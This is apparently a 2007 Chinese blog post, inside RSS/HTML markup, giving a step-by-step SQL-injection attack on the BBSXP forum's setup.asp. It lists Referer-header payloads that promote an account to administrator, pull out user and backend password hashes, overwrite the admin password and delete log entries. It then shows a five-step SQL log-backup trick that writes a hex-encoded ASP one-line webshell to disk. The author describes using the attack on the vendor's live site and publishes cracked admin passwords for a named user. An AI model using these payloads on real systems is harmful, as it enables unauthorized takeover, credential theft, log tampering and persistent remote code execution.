																<font face="Verdana">作者：TTFCT<br /><br />漏洞存在于文件setup.asp中<br /><br />第一部份<br /><br />注册－&gt;登陆-&gt;发帖-&gt;编辑-&gt;抓包-&gt;改包-&gt;提升为管理员-&gt;更改后台密码-&gt;登陆后台-&gt;WEBSHELL<br /><br />这里我设密码为：ttfct1 ,NC提交，成功提为管理员。用密码：ttfct1登陆后台。成功获取WEBSHELL，成功备份，获取WEBSHELL　成功。<br /><br />WEBSHELL获取的两种方法<br />一：后台上传增加 htr<br />二：log备份，共4步<br /><br />第二部份<br /><br />检测官方网站<br />我已注册好了，用户是sina147<br />注册－&gt;登陆-&gt;发帖-&gt;编辑-&gt;抓包<br />为了不引起管理员注意，我们直接获取管理员密码和后台密码，然后登陆后台。<br /><br />不好意思，刚才出了点问题，停电了。继续，抓包，修改，我查了一下，yuzi就是管理员了。<br /><br />yuzi的密码5D4D89BEA718BEE10686FB053E86F13B-&gt;080532779<br />后台登陆密码：531BC3E862F67DC2BAA871EABDE81A4F-&gt;080532449<br /><br />登陆后台<br />本文件请求的物理路径 D:\www\bbs.yuzi.net\Admin_other.asp 有了这个，就有机会拿WEBSHELL了<br />后面的动画就不作了，大家发挥吧。<br /><br />OVER<br />************************************************************************************<br />提升为管理员:<br />Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserRoleID=1 where username='sina'--<br /><br /><br />获取管理员密码(即一次密码）：<br />Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserMail=(select userpass from bbsxp_users where username='yuzi') where username='sina147'<br /><br />获取后台密码(即二次密码）：<br />Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserMail=(select top 1 adminpassword from bbsxp_sitesettings) where username='sina147'<br /><br />更改后台管理密码(二次密码）<br />Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='sina')<br /><br /><br />删除日志：<br />Referer: http://127.0.0.1','','','修改帖子成功');delete from bbsxp_log where username='sina147'<br /><br />LOG备份<br />备份地址：C:\Inetpub\wwwroot\ttfct.asp<br /><br />第一步<br />create table [dbo].[shit_tmp] ([cmd] [image])<br /><br />第二步<br />declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate<br /><br />第三步<br />insert into [shit_tmp](cmd) values(0x3C25657865637574652872657175657374282261222929253E)<br /><br />第四步<br />declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C0049006E00650074007000750062005C0077007700770072006F006F0074005C00740074006600630074002E00610073007000 backup log @a to disk=@s with init,no_truncate<br /><br />第五步<br />Drop table [shit_tmp]<br /></font>
														</p>
												</font>
										</div>
								</td>
						</tr>
				</tbody>
		</table>
<img src ="http://www.cnitblog.com/lycou/aggbug/22512.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/lycou/" target="_blank">Lycou' Blog</a> 2007-02-01 15:43 <a href="http://www.cnitblog.com/lycou/articles/22512.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>